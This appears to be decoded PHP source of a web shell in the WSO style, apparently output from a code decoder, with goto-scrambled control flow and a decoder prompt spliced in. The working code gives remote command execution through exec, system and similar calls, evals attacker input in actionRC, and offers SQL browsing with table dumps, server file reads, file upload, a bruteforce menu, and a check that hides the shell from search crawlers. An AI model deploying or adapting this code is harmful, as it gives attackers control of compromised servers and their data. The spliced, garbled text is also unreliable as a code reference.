"; goto ab8fa; d4a2b: $this->query('SELECT * FROM ' . $table); goto d6e53; ab8fa: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto F41bd; E2fcc: foreach ($item as $k => $v) { goto ead39; ead39: $item[$k] = "'" . addslashes($v) . "'"; goto Bafca; F77d2: D4dfe: goto E1754; Bafca: $columns[] = $k; goto F77d2; E1754: } goto bdfbb; d6e53: Ed599: goto e6393; a906a: D3aa9: goto b49ea; bdfbb: Acdca: goto e0a2f; a7a34: $columns = array(); goto E2fcc; E9c5e: } goto fdc7a; F5ab1: } } goto De129; ac17d: $tmp = "<input type=text name=sql_base value=''>"; goto e9bce; E69ae: echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<td><select name='type'><option value='mysql' "; goto d7762; C8c9c: echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>
<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>
<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>"; goto ac17d; Fab9b: if (@$_POST['type'] == 'pgsql') { echo 'selected'; } goto C8c9c; d7762: if (@$_POST['type'] == 'mysql') { echo 'selected'; } goto A443b; e9bce: if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { goto C82b2; E2041: if (!($item = $db->fetch())) { goto a0a2a; } goto ff49f; ff49f: list($key, $value) = each($item); goto f7d49; cefb6: c5360: goto B7e08; f7d49: echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>'; goto fe6aa; ed8f6: C1e9a: goto cefb6; b4812: a0a2a: goto E192a; fe6aa: goto ee8fe; goto b4812; b6c01: echo "<select name=sql_base><option value=''></option>"; goto Af305; C82b2: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto c5360; case "UTF-8": $db->setCharset('utf8'); goto c5360; case "KOI8-R": $db->setCharset('koi8r'); goto c5360; case "KOI8-U": $db->setCharset('koi8u'); goto c5360; case "cp866": $db->setCharset('cp866'); goto c5360; } goto ed8f6; E192a: echo '</select>'; goto F8974; Af305: ee8fe: goto E2041; B7e08: $db->listDbs(); goto b6c01; F8974: } else { echo $tmp; } } else { echo $tmp; } goto Ab2db; A443b: echo ">MySql</option><option value='pgsql' "; goto Fab9b; F141c: if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') { goto a27fa; e70c3: f6989: goto ff06d; F8992: $db->selectdb($_POST['sql_base']); goto B044d; A9a1e: cf17a: goto e70c3; a27fa: $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto F8992; ff06d: if (empty($_POST['file'])) { goto Ac708; E894a: exit; goto Ecb21; B3f10: header("Content-Type: text/plain"); goto D22be; D22be: foreach ($_POST['tbl'] as $v) { $db->dump($v); B3aab: } goto Bd25e; Fa22b: header("Content-Disposition: attachment; filename=dump.sql"); goto B3f10; Bd25e: b1fae: goto E894a; Ac708: ob_start("ob_gzhandler", 4096); goto Fa22b; Ecb21: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto cea68; C8699: unset($_POST['p2']); goto d7f57; ed636: fda1d: goto A7d23; cea68: foreach ($_POST['tbl'] as $v) { $db->dump($v, $fp); A3813: } goto ed636; A7d23: fclose($fp); goto C8699; d7f57: } else { die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } goto Eab5b; B044d: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto f6989; case "UTF-8": $db->setCharset('utf8'); goto f6989; case "KOI8-R": $db->setCharset('koi8r'); goto f6989; case "KOI8-U": $db->setCharset('koi8u'); goto f6989; case "cp866": $db->setCharset('cp866'); goto f6989; } goto A9a1e; Eab5b: } goto f6861; d56a6: echo '</div>'; goto ab2db; Ab2db: echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
</tr>
</table>
<script>
s_db='" . @addslashes($_POST['sql_base']) . "';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>"; goto c2bbb; c2bbb: if (isset($db) && $db->link) { goto D857b; C5ede: if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto F94ff; F94ff: if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto f517a; e6438: echo "</table></form><br/>"; goto C5ede; D857b: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto c3477; c3477: if (!empty($_POST['sql_base'])) { goto C99f8; a57e2: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto D2765; Fe241: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto D4dc3; e7536: Bd81c: goto A4805; F2940: echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto B26ad; B26ad: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto Eff6b; F856e: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto Aead7; A4805: if (!($item = $db->fetch($tbls_res))) { goto F0dd3; } goto B4b04; f8446: F0dd3: goto e5d66; e5d66: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto e6351; f018e: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto Abb63; e5642: $line = $line == 1 ? 2 : 1; goto D9902; e239f: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto E5fe7; D9902: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } fd092: } goto a10e0; D2067: echo '</table>'; goto A24c6; b1890: if (!($item = $db->fetch())) { goto a67a9; } goto b5fbd; f41bd: echo '</tr>'; goto C2bfa; a10e0: Dab8e: goto f41bd; f4f04: b17e9: goto b1890; E5fe7: $line = 1; goto f4f04; Ff42d: a67a9: goto D2067; C2bfa: goto b17e9; goto Ff42d; Abb63: $title = false; goto e239f; Ccc40: echo '<tr class="l' . $line . '">'; goto e5642; b5fbd: if (!$title) { goto Dda67; Dda67: echo '<tr>'; goto F8e65; b30e1: reset($item); goto B251f; ff081: $line = 2; goto Acb1e; adcd7: d4fb3: goto b30e1; A1c44: echo '</tr><tr>'; goto ff081; F8e65: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; cac77: } goto adcd7; B251f: $title = true; goto A1c44; Acb1e: } goto Ccc40; A24c6: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto F2940; B4b04: list($key, $value) = each($item); goto F856e; C99f8: $db->selectdb($_POST['sql_base']); goto Fe241; D2765: goto Bd81c; goto f8446; d54d8: echo "</td></tr>"; goto a72e3; e6351: if (@$_POST['p1'] == 'select') { goto Dc061; c3e6e: echo " of {$pages}"; goto c60f5; b9ca0: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>"; } goto ebed0; E51d7: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto e182b; Dc061: $_POST['p1'] = 'query'; goto E93be; e182b: $num = $db->fetch(); goto e9edd; e9edd: $pages = ceil($num['n'] / 30); goto ea659; E93be: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto E51d7; b9a4d: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto Acdd3; c60f5: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>"; } goto b9ca0; Acdd3: echo "<br><br>"; goto Afe72; ebed0: $_POST['p3']--; goto b9a4d; ea659: echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto c3e6e; Afe72: } goto f018e; Eff6b: echo "</textarea><br/><input type=submit value='Execute'>"; goto d54d8; D4dc3: $tbls_res = $db->listTables(); goto e7536; Aead7: $value = htmlspecialchars($value); goto a57e2; a72e3: } goto e6438; f517a: } else { echo htmlspecialchars($db->error()); } goto d56a6; De129: $db = new DbClass($_POST['type']); goto F141c; ab2db: nWfzhFooter(); goto Ac562; f6861: nWfzhHeader(); goto E69ae; Ac562: } goto C2e1c; E5efa: if ($cwd[strlen($cwd) - 1] != '/') { $cwd .= '/'; } goto E3398; E3386: if (empty($_POST['a'])) { if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a'] = $default_action; } else { $_POST['a'] = 'SecInfo'; } } goto f29b6; Dc03e: function nWfzhEx($in) { goto Ac9f5; Ac9f5: $out = ''; goto dc72c; dc72c: if (function_exists('exec')) { @exec($in, $out); $out = @join("
", $out); } elseif (function_exists('passthru')) { goto Ad49b; c3035: @passthru($in); goto Fd7bf; Fd7bf: $out = ob_get_clean(); goto a2702; Ad49b: ob_start(); goto c3035; a2702: } elseif (function_exists('system')) { goto D7eac; E738a: @system($in); goto D6893; D6893: $out = ob_get_clean(); goto e6499; D7eac: ob_start(); goto E738a; e6499: } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { goto a4235; bd8fc: goto F3463; goto Bffa3; Dc462: pclose($f); goto D82d5; d87fe: if (@feof($f)) { goto Da5f6; } goto Fc4ce; a3189: F3463: goto d87fe; a4235: $out = ""; goto a3189; Fc4ce: $out .= fread($f, 1024); goto bd8fc; Bffa3: Da5f6: goto Dc462; D82d5: } goto fee4e; fee4e: return $out; goto Fc9a3; Fc9a3: } goto Bc7b6; a7383: $cwd = @getcwd(); goto Ad0da; Eb763: if (!$safe_mode) { error_reporting(0); } goto cfad7; Ad0da: if ($os == 'win') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto E5efa; D12f4: function nWfzhPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' . nWfzhPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font color=white>' . nWfzhPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' . nWfzhPerms(@fileperms($f)) . '</font>'; } } goto fda81; c8a09: function actionConsole() { goto Cd0ea; C9673: bc81a: goto e0421; c7565: foreach ($GLOBALS['aliases'] as $n => $v) { goto C82e9; C82e9: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto A6424; } goto B179d; B179d: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto ab3f9; ab3f9: A6424: goto a72a6; a72a6: } goto C9673; E17c6: echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; goto abf7a; fe751: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; goto c7565; abf7a: echo '</form></div><script>d.cf.cmd.focus();</script>'; goto Ce426; e0421: echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; goto Ffc02; c6098: nWfzhHeader(); goto f7395; Ce426: nWfzhFooter(); goto d8d38; Fdf11: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto c6098; f7395: echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur = cmds.length-1;
}
</script>"; goto fe751; c909d: if (isset($_POST['ajax'])) { goto d4f9c; E89ab: ob_start(); goto A820d; d4f9c: nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto E89ab; b6063: exit; goto b74fe; E8dd4: echo strlen($temp), "
", $temp; goto b6063; cc19f: $temp = ob_get_clean(); goto E8dd4; c8f9b: echo "d.cf.output.value+='" . $temp . "';"; goto C7d7b; E4acf: if (preg_match("!.*cd\s+([^;]+)\$!", $_POST['p1'], $match)) { if (@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto c8f9b; A820d: echo "d.cf.cmd.value='';
"; goto de112; de112: $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
\$ " . $_POST['p1'] . "
" . nWfzhEx($_POST['p1']), "
\'")); goto E4acf; C7d7b: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto cc19f; b74fe: } goto Fdf11; Ffc02: if (!empty($_POST['p1'])) { echo htmlspecialchars("\$ " . $_POST['p1'] . "
" . nWfzhEx($_POST['p1'])); } goto E17c6; Cd0ea: if (!empty($_POST['p1']) && !empty($_POST['p2'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif (!empty($_POST['p1'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0); } goto c909d; d8d38: } goto e0c19; A8b79: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto a7383; e0c19: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } goto bfd72; a45bc: if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function posix_getpwuid($p) { return false; } } goto d61c6; Db647: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto F7c7f; ca1d9: error_reporting(0); goto D7cf8; ca726: function nWfzhHeader() { goto acb76; c6ccb: $opt_charsets = ''; goto Cd90c; B5fed: $n = count($path); goto ac94c; aefcf: b140d: goto F7bd0; b3a8e: $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto Dd20d; E8423: if (!($j <= $i)) { goto e453f; } goto ed9e3; ab0c1: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: {$color} !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) . "'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';
var p1_ = '" . (strpos(@$_POST['p1'], "
") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
var p2_ = '" . (strpos(@$_POST['p2'], "
") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
var p3_ = '" . (strpos(@$_POST['p3'], "
") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\\d+)([\\S\\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; goto E951b; E46d0: goto d8b21; goto e00d9; ac94c: $i = 0; goto ed80c; A7b42: $menu = ''; goto F6a31; e8fbd: if (!function_exists('posix_getegid')) { goto ae87b; ae87b: $user = @get_current_user(); goto a2ca8; a2ca8: $uid = @getmyuid(); goto Bbee3; cf5a7: $group = "?"; goto A8426; Bbee3: $gid = @getmygid(); goto cf5a7; A8426: } else { goto e34ba; e34ba: $uid = @posix_getpwuid(posix_geteuid()); goto c79e0; a6262: $gid = $gid['gid']; goto dba1d; Df6e6: $group = $gid['name']; goto a6262; b541f: $user = $uid['name']; goto A16aa; A16aa: $uid = $uid['uid']; goto Df6e6; c79e0: $gid = @posix_getgrgid(posix_getegid()); goto b541f; dba1d: } goto cd9e5; B218b: $kernel = @php_uname('s'); goto d3d7c; b137c: $cwd_links .= "\")'>" . $path[$i] . "/</a>"; goto Eaf5c; ed80c: d8b21: goto Cb288; e2940: if (strpos('Linux', $kernel) !== false) { $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto e8fbd; e6354: $drives = ""; goto fede2; F7bd0: $j++; goto ae114; d3d7c: $explink = ''; goto e2940; A4dea: $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); goto c6ccb; ed9e3: $cwd_links .= $path[$j] . '/'; goto aefcf; d861d: $i++; goto E46d0; F9d10: e453f: goto b137c; ff5ae: global $color; goto ab0c1; Baa2f: $m['Self remove'] = 'SelfRemove'; goto A7b42; F6a31: foreach ($m as $k => $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; Ab8e0: } goto C98ec; C98ec: Aace3: goto e6354; acb76: if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['default_charset']; } goto ff5ae; a0239: $j = 0; goto Bd509; Bd509: e7a3f: goto E8423; A3944: $path = explode("/", $GLOBALS['cwd']); goto B5fed; Cb288: if (!($i < $n - 1)) { goto f1a65; } goto Cf74a; ae114: goto e7a3f; goto F9d10; C6036: $totalSpace = $totalSpace ? $totalSpace : 1; goto adb32; e00d9: f1a65: goto A4dea; Ad355: echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . nWfzhViewSize($totalSpace) . ' <span>Free:</span> ' . nWfzhViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . nWfzhPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; goto e74f9; Cf74a: $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; goto a0239; fede2: if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } ac046: } A53e4: } goto Ad355; E951b: $freeSpace = @diskfreespace($GLOBALS['cwd']); goto E3d9d; Dd20d: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto Baa2f; cd9e5: $cwd_links = ''; goto A3944; Cd90c: foreach ($charsets as $item) { $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>'; d9f35: } goto ec8d9; Eaf5c: fd352: goto d861d; adb32: $release = @php_uname('r'); goto B218b; ec8d9: Ecfbe: goto b3a8e; E3d9d: $totalSpace = @disk_total_space($GLOBALS['cwd']); goto C6036; e74f9: } goto F3652; f5f32: $color = "#df5"; goto B37cf; e8a7a: @ini_set('max_execution_time', 0); goto a18f7; E3398: if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax; } goto C8433; F3652: function nWfzhFooter() { $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>"; } goto a45bc; a0955: exit; ?>Did this file decode correctly?
Original Code
goto ca1d9; a186c: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "nWfzh_version" => nWfzh_VERSION, "safemode" => @ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto E3386; Bc7b6: function nWfzhViewSize($s) { if (is_int($s)) { $s = sprintf("%u", $s); } if ($s >= 1073741824) { return sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) { return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) { return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; } } goto A8d99; dd1cc: $default_use_ajax = true; goto Bef43; A74ac: $home_cwd = @getcwd(); goto A8b79; db69a: function actionFilesMan() { goto Ccac1; F939b: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => nWfzhPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); goto b2f40; Faff5: aeff8: goto E2f27; cbedb: if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) { echo "file name: <input type=text name=p2 value='nWfzh_" . date("Ymd_His") . 